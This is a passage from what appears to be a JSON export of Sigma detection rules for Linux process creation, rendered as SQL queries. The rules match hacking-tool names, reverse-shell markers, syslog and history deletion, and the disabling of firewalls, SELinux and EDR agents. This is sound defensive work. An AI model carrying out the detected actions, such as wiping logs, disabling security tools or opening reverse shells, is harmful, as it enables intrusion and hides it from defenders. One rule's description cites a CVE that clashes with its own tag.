            "SELECT * FROM logs WHERE ((Image LIKE '%/crackmapexec' ESCAPE '\\' OR Image LIKE '%/havoc' ESCAPE '\\' OR Image LIKE '%/merlin-agent' ESCAPE '\\' OR Image LIKE '%/merlinServer-Linux-x64' ESCAPE '\\' OR Image LIKE '%/msfconsole' ESCAPE '\\' OR Image LIKE '%/msfvenom' ESCAPE '\\' OR Image LIKE '%/ps-empire server' ESCAPE '\\' OR Image LIKE '%/ps-empire' ESCAPE '\\' OR Image LIKE '%/sliver-client' ESCAPE '\\' OR Image LIKE '%/sliver-server' ESCAPE '\\' OR Image LIKE '%/Villain.py' ESCAPE '\\') OR (Image LIKE '%/cobaltstrike%' ESCAPE '\\' OR Image LIKE '%/teamserver%' ESCAPE '\\') OR (Image LIKE '%/autorecon' ESCAPE '\\' OR Image LIKE '%/httpx' ESCAPE '\\' OR Image LIKE '%/legion' ESCAPE '\\' OR Image LIKE '%/naabu' ESCAPE '\\' OR Image LIKE '%/netdiscover' ESCAPE '\\' OR Image LIKE '%/nuclei' ESCAPE '\\' OR Image LIKE '%/recon-ng' ESCAPE '\\') OR Image LIKE '%/sniper%' ESCAPE '\\' OR (Image LIKE '%/dirb' ESCAPE '\\' OR Image LIKE '%/dirbuster' ESCAPE '\\' OR Image LIKE '%/eyewitness' ESCAPE '\\' OR Image LIKE '%/feroxbuster' ESCAPE '\\' OR Image LIKE '%/ffuf' ESCAPE '\\' OR Image LIKE '%/gobuster' ESCAPE '\\' OR Image LIKE '%/wfuzz' ESCAPE '\\' OR Image LIKE '%/whatweb' ESCAPE '\\') OR (Image LIKE '%/joomscan' ESCAPE '\\' OR Image LIKE '%/nikto' ESCAPE '\\' OR Image LIKE '%/wpscan' ESCAPE '\\') OR (Image LIKE '%/aircrack-ng' ESCAPE '\\' OR Image LIKE '%/bloodhound-python' ESCAPE '\\' OR Image LIKE '%/bpfdos' ESCAPE '\\' OR Image LIKE '%/ebpfki' ESCAPE '\\' OR Image LIKE '%/evil-winrm' ESCAPE '\\' OR Image LIKE '%/hashcat' ESCAPE '\\' OR Image LIKE '%/hoaxshell.py' ESCAPE '\\' OR Image LIKE '%/hydra' ESCAPE '\\' OR Image LIKE '%/john' ESCAPE '\\' OR Image LIKE '%/ncrack' ESCAPE '\\' OR Image LIKE '%/nxc-ubuntu-latest' ESCAPE '\\' OR Image LIKE '%/pidhide' ESCAPE '\\' OR Image LIKE '%/pspy32' ESCAPE '\\' OR Image LIKE '%/pspy32s' ESCAPE '\\' OR Image LIKE '%/pspy64' ESCAPE '\\' OR Image LIKE '%/pspy64s' ESCAPE '\\' OR Image LIKE '%/setoolkit' ESCAPE '\\' OR Image LIKE '%/sqlmap' ESCAPE '\\' OR Image LIKE '%/writeblocker' ESCAPE '\\') OR Image LIKE '%/linpeas%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_susp_hktl_execution.yml"
    },
    {
        "title": "Pnscan Binary Data Transmission Activity",
        "id": "97de11cd-4b67-4abf-9a8b-1020e670aa9e",
        "description": "Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\nThis behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT\n",
        "author": "David Burkett (@signalblur)",
        "tags": [
            "attack.discovery",
            "attack.t1046"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE CommandLine REGEXP '-(W|R)\\s?(\\s|\"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|\"|')'"
        ],
        "filename": "proc_creation_lnx_pnscan_binary_cli_pattern.yml"
    },
    {
        "title": "Commands to Clear or Remove the Syslog",
        "id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31",
        "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks",
        "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.defense-evasion",
            "attack.t1070.002"
        ],
        "falsepositives": [
            "Log rotation."
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%rm /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%mv /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% >/var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% > /var/log/syslog%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_clear_syslog.yml"
    },
    {
        "title": "ESXi System Information Discovery Via ESXCLI",
        "id": "e80273e1-9faf-40bc-bd85-dbaff104c4e9",
        "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.",
        "author": "Cedric Maurugeon",
        "tags": [
            "attack.discovery",
            "attack.t1033",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%system%' ESCAPE '\\' AND (CommandLine LIKE '% get%' ESCAPE '\\' OR CommandLine LIKE '% list%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_esxcli_system_discovery.yml"
    },
    {
        "title": "Potential Linux Amazon SSM Agent Hijacking",
        "id": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7",
        "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.",
        "author": "Muhammad Faisal",
        "tags": [
            "attack.command-and-control",
            "attack.persistence",
            "attack.t1219"
        ],
        "falsepositives": [
            "Legitimate activity of system administrators"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/amazon-ssm-agent' ESCAPE '\\' AND CommandLine LIKE '%-register %' ESCAPE '\\' AND CommandLine LIKE '%-code %' ESCAPE '\\' AND CommandLine LIKE '%-id %' ESCAPE '\\' AND CommandLine LIKE '%-region %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_ssm_agent_abuse.yml"
    },
    {
        "title": "ESXi Network Configuration Discovery Via ESXCLI",
        "id": "33e814e0-1f00-4e43-9c34-31fb7ae2b174",
        "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.",
        "author": "Cedric Maurugeon",
        "tags": [
            "attack.discovery",
            "attack.t1033",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%network%' ESCAPE '\\' AND (CommandLine LIKE '% get%' ESCAPE '\\' OR CommandLine LIKE '% list%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_esxcli_network_discovery.yml"
    },
    {
        "title": "Linux Doas Tool Execution",
        "id": "067d8238-7127-451c-a9ec-fa78045b618b",
        "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.",
        "author": "Sittikorn S, Teoderick Contreras",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1548"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/doas' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_doas_execution.yml"
    },
    {
        "title": "ESXi VM Kill Via ESXCLI",
        "id": "2992ac4d-31e9-4325-99f2-b18a73221bb2",
        "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.",
        "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%vm process%' ESCAPE '\\' AND CommandLine LIKE '%kill%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_esxcli_vm_kill.yml"
    },
    {
        "title": "Potential PHP Reverse Shell",
        "id": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e",
        "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n",
        "author": "@d4ns4n_",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/php%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND CommandLine LIKE '%fsockopen%' ESCAPE '\\' AND (CommandLine LIKE '%ash%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%bsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%pdksh%' ESCAPE '\\' OR CommandLine LIKE '%sh%' ESCAPE '\\' OR CommandLine LIKE '%tcsh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_php_reverse_shell.yml"
    },
    {
        "title": "Suspicious Curl Change User Agents - Linux",
        "id": "b86d356d-6093-443d-971c-9b07db583c68",
        "description": "Detects a suspicious curl process start on linux with set useragent options",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.command-and-control",
            "attack.t1071.001"
        ],
        "falsepositives": [
            "Scripts created by developers and admins",
            "Administrative activity"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_curl_useragent.yml"
    },
    {
        "title": "Python Reverse Shell Execution Via PTY And Socket Modules",
        "id": "32e62bc7-3de0-4bb1-90af-532978fe42c0",
        "description": "Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.\n",
        "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%python%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%import%' ESCAPE '\\' AND CommandLine LIKE '%pty%' ESCAPE '\\' AND CommandLine LIKE '%socket%' ESCAPE '\\' AND CommandLine LIKE '%spawn%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_python_reverse_shell.yml"
    },
    {
        "title": "Crontab Enumeration",
        "id": "403ed92c-b7ec-4edd-9947-5b535ee12d46",
        "description": "Detects usage of crontab to list the tasks of the user",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.discovery",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate use of crontab"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/crontab' ESCAPE '\\' AND CommandLine LIKE '% -l%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_crontab_enumeration.yml"
    },
    {
        "title": "Shell Execution via Flock - Linux",
        "id": "4b09c71e-4269-4111-9cdd-107d8867f0cc",
        "description": "Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/flock' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_flock_shell_execution.yml"
    },
    {
        "title": "Apache Spark Shell Command Injection - ProcessCreation",
        "id": "c8a5f584-cdc8-42cc-8cce-0398e4265de3",
        "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.initial-access",
            "attack.t1190",
            "cve.2022-33891"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '%\\\\bash' ESCAPE '\\' AND (CommandLine LIKE '%id -Gn `%' ESCAPE '\\' OR CommandLine LIKE '%id -Gn ''%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
    },
    {
        "title": "Disabling Security Tools",
        "id": "e3a8a052-111f-4606-9aee-f28ebeb76776",
        "description": "Detects disabling security tools",
        "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/setenforce' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_security_tools_disabling.yml"
    },
    {
        "title": "History File Deletion",
        "id": "1182f3b3-e716-4efa-99ab-d2685d04360f",
        "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.impact",
            "attack.t1565.001"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_susp_history_delete.yml"
    },
    {
        "title": "Mount Execution With Hidepid Parameter",
        "id": "ec52985a-d024-41e3-8ff6-14169039a0b3",
        "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.credential-access",
            "attack.t1564"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/mount' ESCAPE '\\' AND CommandLine LIKE '%hidepid=2%' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_mount_hidepid.yml"
    },
    {
        "title": "ESXi Storage Information Discovery Via ESXCLI",
        "id": "f41dada5-3f56-4232-8503-3fb7f9cf2d60",
        "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.",
        "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
        "tags": [
            "attack.discovery",
            "attack.t1033",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%storage%' ESCAPE '\\' AND (CommandLine LIKE '% get%' ESCAPE '\\' OR CommandLine LIKE '% list%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_esxcli_storage_discovery.yml"
    },
    {
        "title": "Python Spawning Pretty TTY Via PTY Module",
        "id": "c4042d54-110d-45dd-a0e1-05c47822c937",
        "description": "Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.\n",
        "author": "Nextron Systems",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (((Image LIKE '%/python' ESCAPE '\\' OR Image LIKE '%/python2' ESCAPE '\\' OR Image LIKE '%/python3' ESCAPE '\\') OR (Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\')) AND (CommandLine LIKE '%import pty%' ESCAPE '\\' OR CommandLine LIKE '%from pty %' ESCAPE '\\') AND CommandLine LIKE '%spawn%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_python_pty_spawn.yml"
    },
    {
        "title": "Potential Xterm Reverse Shell",
        "id": "4e25af4b-246d-44ea-8563-e42aacab006b",
        "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel",
        "author": "@d4ns4n_",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%xterm%' ESCAPE '\\' AND CommandLine LIKE '%-display%' ESCAPE '\\' AND CommandLine LIKE '%:1' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_xterm_reverse_shell.yml"
    },
    {
        "title": "Capabilities Discovery - Linux",
        "id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530",
        "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/getcap' ESCAPE '\\' AND (CommandLine LIKE '% -r %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_capa_discovery.yml"
    },
    {
        "title": "OS Architecture Discovery Via Grep",
        "id": "d27ab432-2199-483f-a297-03633c05bae6",
        "description": "Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"\n",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/grep' ESCAPE '\\' AND (CommandLine LIKE '%aarch64' ESCAPE '\\' OR CommandLine LIKE '%arm' ESCAPE '\\' OR CommandLine LIKE '%i386' ESCAPE '\\' OR CommandLine LIKE '%i686' ESCAPE '\\' OR CommandLine LIKE '%mips' ESCAPE '\\' OR CommandLine LIKE '%x86\\_64' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_grep_os_arch_discovery.yml"
    },
    {
        "title": "Local Groups Discovery - Linux",
        "id": "676381a6-15ca-4d73-a9c8-6a22e970b90d",
        "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings",
        "author": "Ömer Günal, Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1069.001"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/groups' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '%/etc/group%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_local_groups.yml"
    },
    {
        "title": "DD File Overwrite",
        "id": "2953194b-e33c-4859-b9e8-05948c167447",
        "description": "Detects potential overwriting and deletion of a file using DD.",
        "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.impact",
            "attack.t1485"
        ],
        "falsepositives": [
            "Any user deleting files that way."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image IN ('/bin/dd', '/usr/bin/dd') AND CommandLine LIKE '%of=%' ESCAPE '\\' AND (CommandLine LIKE '%if=/dev/zero%' ESCAPE '\\' OR CommandLine LIKE '%if=/dev/null%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_dd_file_overwrite.yml"
    },
    {
        "title": "BPFtrace Unsafe Option Usage",
        "id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39",
        "description": "Detects the usage of the unsafe bpftrace option",
        "author": "Andreas Hunkeler (@Karneades)",
        "tags": [
            "attack.execution",
            "attack.t1059.004"
        ],
        "falsepositives": [
            "Legitimate usage of the unsafe option"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%bpftrace' ESCAPE '\\' AND CommandLine LIKE '%--unsafe%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml"
    },
    {
        "title": "Bash Interactive Shell",
        "id": "6104e693-a7d6-4891-86cb-49a258523559",
        "description": "Detects execution of the bash shell with the interactive flag \"-i\".",
        "author": "@d4ns4n_",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/bash' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_bash_interactive_shell.yml"
    },
    {
        "title": "Clear Linux Logs",
        "id": "80915f59-9b56-4616-9de0-fd0dea6c12fe",
        "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1070.002"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\') AND (CommandLine LIKE '%/var/log%' ESCAPE '\\' OR CommandLine LIKE '%/var/spool/mail%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_clear_logs.yml"
    },
    {
        "title": "Connection Proxy",
        "id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c",
        "description": "Detects setting proxy configuration",
        "author": "Ömer Günal",
        "tags": [
            "attack.defense-evasion",
            "attack.t1090"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%http\\_proxy=%' ESCAPE '\\' OR CommandLine LIKE '%https\\_proxy=%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_proxy_connection.yml"
    },
    {
        "title": "Triple Cross eBPF Rootkit Execve Hijack",
        "id": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e",
        "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.privilege-escalation"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '%execve\\_hijack%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml"
    },
    {
        "title": "Shell Invocation via Apt - Linux",
        "id": "bb382fd5-b454-47ea-a264-1828e4c766d6",
        "description": "Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%APT::Update::Pre-Invoke::=%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_apt_shell_execution.yml"
    },
    {
        "title": "Atlassian Confluence CVE-2022-26134",
        "id": "7fb14105-530e-4e2e-8cfb-99f7d8700b66",
        "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.initial-access",
            "attack.execution",
            "attack.t1190",
            "attack.t1059",
            "cve.2022-26134"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '/opt/atlassian/confluence/%' ESCAPE '\\' AND ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml"
    },
    {
        "title": "Capsh Shell Invocation - Linux",
        "id": "db1ac3be-f606-4e3a-89e0-9607cbe6b98a",
        "description": "Detects the use of the \"capsh\" utility to invoke a shell.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/capsh' ESCAPE '\\' AND CommandLine LIKE '% --' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_capsh_shell_invocation.yml"
    },
    {
        "title": "Linux Package Uninstall",
        "id": "95d61234-7f56-465c-6f2d-b562c6fedbc4",
        "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".",
        "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1070"
        ],
        "falsepositives": [
            "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)."
        ],
        "level": "low",
        "rule": [
